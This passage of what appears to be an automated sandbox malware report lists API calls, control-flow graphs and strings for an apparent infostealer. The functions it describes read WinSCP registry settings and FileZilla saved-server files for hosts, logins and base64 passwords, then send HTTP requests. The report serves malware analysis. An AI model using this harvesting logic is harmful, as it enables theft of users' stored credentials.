                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2452939696-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 180fdf943f679f0908199cc39e44e1d0c0beb04e4c0ad37296b993fdceb6a780
                                                                                                                                                                                                                                                                                      • Instruction ID: 2046fac39060b3b77728db7903071d1a84601050c9d96548d090f17622b8ad63
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 180fdf943f679f0908199cc39e44e1d0c0beb04e4c0ad37296b993fdceb6a780
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6AD0237160012097C7002B18FD4D98737545FC1708F010111F745B7151D135996E87DF
                                                                                                                                                                                                                                                                                      Function 0040D080 Relevance: 149.5, APIs: 82, Strings: 3, Instructions: 788memorystringregistryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040D09D
                                                                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040D0B6
                                                                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040D0CE
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040D0EA
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D0FB
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000008,-00000001), ref: 0040D105
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040D130
                                                                                                                                                                                                                                                                                      • strcpy_s.MSVCRT ref: 0040D184
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D1CD
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D21F
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040D244
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(?,?,00000000), ref: 0040D2BA
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000008,00000000), ref: 0040D2C4
                                                                                                                                                                                                                                                                                      • strcpy_s.MSVCRT ref: 0040D2D6
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D2E2
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D2EC
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D318
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D322
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D332
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D33C
                                                                                                                                                                                                                                                                                      • strcpy_s.MSVCRT ref: 0040D34E
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D35A
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D364
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D385
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D38F
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D39F
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D3A9
                                                                                                                                                                                                                                                                                      • strcpy_s.MSVCRT ref: 0040D3B7
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D3C3
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D3CD
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D3E4
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D3EE
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D40F
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D419
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D429
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D433
                                                                                                                                                                                                                                                                                      • strcpy_s.MSVCRT ref: 0040D44B
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D457
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,76EC5E70), ref: 0040D461
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040D468
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D47B
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D485
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040D4B6
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 0040D4CE
                                                                                                                                                                                                                                                                                      • strcpy_s.MSVCRT ref: 0040D50C
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D559
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D5BB
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D5C3
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D5CD
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040D5D4
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D5E9
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 0040D5F3
                                                                                                                                                                                                                                                                                      • strcpy_s.MSVCRT ref: 0040D602
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040D60A
                                                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D614
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040D65C
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000), ref: 0040D7C4
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000), ref: 0040D811
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000), ref: 0040D883
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(0042150A,00000000), ref: 0040D9A7
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D9DD
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D9FA
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DA10
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DA26
                                                                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040DA55
                                                                                                                                                                                                                                                                                      • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,00000004), ref: 0040DA7F
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040DA9C
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • Security, xrefs: 0040DA77
                                                                                                                                                                                                                                                                                      • UseMasterPassword, xrefs: 0040DA72
                                                                                                                                                                                                                                                                                      • Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040DA4B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$Process$Free$??3@Allocstrcpy_s$lstrlen$memset$strlen$_invalid_parameter_noinfo_noreturnstrchr$CloseOpenValue
                                                                                                                                                                                                                                                                                      • String ID: Security$Software\Martin Prikryl\WinSCP 2\Configuration$UseMasterPassword
                                                                                                                                                                                                                                                                                      • API String ID: 1968195974-1988659312
                                                                                                                                                                                                                                                                                      • Opcode ID: 70b48f79dde87d68d958232ae859ffb282ceefb322202551e63ed2134ea11841
                                                                                                                                                                                                                                                                                      • Instruction ID: 45027c83fb9c17c7e498a7fe32e666c7a7efeb05010239fc81dc07cf04dd4ddd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70b48f79dde87d68d958232ae859ffb282ceefb322202551e63ed2134ea11841
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A342C9B19043005BD710ABA5CD49B6FBBE9EF85314F04082EF986A72D1D778DC49CB9A
                                                                                                                                                                                                                                                                                      Function 0040DE80 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 430stringmemoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 1386 40de80-40df0b call 4101c0 call 411550 call 4102e0 call 410290 call 410230 * 2 call 410340 call 410290 call 410230 call 410200 call 4076b0 1409 40df11-40df1e call 4115b0 1386->1409 1410 40e064-40e095 call 410230 * 5 1386->1410 1409->1410 1416 40df24-40df86 strtok_s call 4101c0 * 4 GetProcessHeap HeapAlloc 1409->1416 1432 40e0b9-40e0c7 StrStrA 1416->1432 1433 40df8c-40e05f lstrlenA call 4101c0 call 410200 * 4 call 413e50 call 410230 call 4104e0 * 4 call 410230 * 4 1416->1433 1435 40e0f0-40e0fe StrStrA 1432->1435 1436 40e0c9-40e0eb lstrlenA call 411e60 call 410290 call 410230 1432->1436 1433->1410 1438 40e100-40e122 lstrlenA call 411e60 call 410290 call 410230 1435->1438 1439 40e127-40e135 StrStrA 1435->1439 1436->1435 1438->1439 1443 40e137-40e159 lstrlenA call 411e60 call 410290 call 410230 1439->1443 1444 40e15e-40e16c StrStrA 1439->1444 1443->1444 1446 40e172-40e1dc lstrlenA call 411e60 call 410290 call 410230 call 410530 lstrlenA LocalAlloc 1444->1446 1447 40e2df-40e2f3 call 410530 lstrlenA 1444->1447 1446->1447 1486 40e1e2-40e1e7 1446->1486 1465 40e0a0-40e0b3 strtok_s 1447->1465 1466 40e2f9-40e30d call 410530 lstrlenA 1447->1466 1465->1432 1465->1433 1466->1465 1478 40e313-40e327 call 410530 lstrlenA 1466->1478 1478->1465 1487 40e32d-40e341 call 410530 lstrlenA 1478->1487 1489 40e2b0-40e2dc call 410240 call 410340 call 410290 call 410230 1486->1489 1490 40e1ed-40e200 1486->1490 1487->1465 1500 40e347-40e436 lstrcatA * 2 call 410530 lstrcatA * 2 call 410530 lstrcatA * 3 call 410530 lstrcatA * 3 call 410530 lstrcatA * 3 call 410240 * 4 1487->1500 1489->1447 1494 40e234-40e23b 1490->1494 1499 40e240-40e244 1494->1499 1503 40e270-40e273 1499->1503 1504 40e246-40e24a 1499->1504 1500->1465 1510 40e291-40e299 1503->1510 1506 40e280-40e283 1504->1506 1507 40e24c-40e250 1504->1507 1506->1510 1512 40e290 1507->1512 1513 40e252-40e255 1507->1513 1516 40e210-40e224 1510->1516 1517 40e29f-40e2a2 1510->1517 1512->1510 1513->1510 1519 40e257-40e25d 1513->1519 1522 40e22a-40e22e 1516->1522 1517->1522 1519->1499 1525 40e25f 1519->1525 1522->1489 1522->1494 1525->1522
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                        • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                                      • strtok_s.MSVCRT ref: 0040DF2D
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(0042150A,0042150A,0042150A,0042150A,?,00000028,0042150A), ref: 0040DF71
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,000F423F), ref: 0040DF7F
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040DF99
                                                                                                                                                                                                                                                                                        • Part of subcall function 00413E50: Sleep.KERNEL32(000003E8,?,?,?), ref: 00413F0F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00413E50: CreateThread.KERNEL32(00000000,00000000,00416EA0,?,00000000,00000000), ref: 00413F6C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00413E50: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00413F78
                                                                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E0BF
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040E0CA
                                                                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E0F6
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040E101
                                                                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 0040E12D
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040E138
                                                                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E164
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040E173
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,00000000,0000001B,-000000DE), ref: 0040E1A5
                                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040E1D1
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrlen$lstrcpy$AllocLocal$File$CreateHeaplstrcat$CloseFolderFreeHandleObjectPathProcessReadSingleSizeSleepThreadWaitstrtok_s
                                                                                                                                                                                                                                                                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                                                                                                                                      • API String ID: 146520747-935134978
                                                                                                                                                                                                                                                                                      • Opcode ID: 206b794b4683130859c7aa731cb200fb9fa8a06513edf901f40cb2cd5f66bbdd
                                                                                                                                                                                                                                                                                      • Instruction ID: 0a1636bca5df7c154e2ca60be6e54f7e11655359c512dbb65eed7aa386b826a3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 206b794b4683130859c7aa731cb200fb9fa8a06513edf901f40cb2cd5f66bbdd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22E1C731A00218ABCB14EBB1DC959EE7B79AF58304F40045EF50277192DF7CA9C6CBA9
                                                                                                                                                                                                                                                                                      Function 00403090 Relevance: 72.4, APIs: 27, Strings: 14, Instructions: 682networkstringmemoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 1548 403090-40317c call 4101c0 call 410200 call 402790 call 4116b0 call 410530 lstrlenA call 410530 call 4116b0 call 4101c0 * 4 StrCmpCA 1571 4031ab-403298 call 4113b0 call 4102e0 call 410290 call 410230 * 2 call 410340 call 4102e0 call 410340 call 410290 call 410230 * 3 call 410340 call 4102e0 call 410290 call 410230 * 2 InternetConnectA 1548->1571 1572 40317e-4031a5 call 410530 InternetOpenA 1548->1572 1577 40386c-4038ae call 411250 * 2 call 4104e0 * 4 call 410200 1571->1577 1642 40329e-4032d5 HttpOpenRequestA 1571->1642 1572->1571 1572->1577 1607 4038c0-403913 call 410230 * 9 1577->1607 1644 403865-403866 InternetCloseHandle 1642->1644 1645 4032db-4032e6 1642->1645 1644->1577 1646 403300-403718 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 401390 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 4102e0 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410340 call 410290 call 410230 call 410530 lstrlenA call 410530 lstrlenA GetProcessHeap RtlAllocateHeap call 410530 * 2 lstrlenA memcpy call 410530 lstrlenA memcpy call 410530 lstrlenA call 410530 * 2 lstrlenA memcpy 1645->1646 1647 4032e8-4032fa InternetSetOptionA 1645->1647 1846 403720-403754 call 410530 lstrlenA call 410530 HttpSendRequestA 1646->1846 1647->1646 1851 403780-4037ac call 411250 HttpQueryInfoA 1846->1851 1852 403756-403769 Sleep 1846->1852 1859 4038b0-4038bd call 4101c0 1851->1859 1860 4037b2-4037bd call 411220 1851->1860 1853 403770-40377b call 411250 1852->1853 1854 40376b-40376e 1852->1854 1853->1859 1854->1846 1854->1853 1859->1607 1860->1859 1865 4037c3-4037de InternetReadFile 1860->1865 1866 4037e0-4037e5 1865->1866 1867 403834-40384c call 410530 StrCmpCA 1865->1867 1866->1867 1868 4037e7-4037ea 1866->1868 1873 403856-403862 InternetCloseHandle 1867->1873 1874 40384e-403850 ExitProcess 1867->1874 1870 4037f0-40382b call 410340 call 410290 call 410230 InternetReadFile 1868->1870 1870->1867 1880 40382d-403832 1870->1880 1873->1644 1880->1867 1880->1870
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                        • Part of subcall function 004116B0: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,00403103,00000000,00000000,?,?,?), ref: 004116E9
                                                                                                                                                                                                                                                                                        • Part of subcall function 004116B0: GetProcessHeap.KERNEL32 ref: 004116FC
                                                                                                                                                                                                                                                                                        • Part of subcall function 004116B0: RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 00411706
                                                                                                                                                                                                                                                                                        • Part of subcall function 004116B0: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0041171D
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 00403114
                                                                                                                                                                                                                                                                                        • Part of subcall function 004116B0: GetLastError.KERNEL32 ref: 00411733
                                                                                                                                                                                                                                                                                        • Part of subcall function 004116B0: GetProcessHeap.KERNEL32 ref: 00411741
                                                                                                                                                                                                                                                                                        • Part of subcall function 004116B0: HeapFree.KERNEL32(00000000,00000000,?), ref: 0041174B
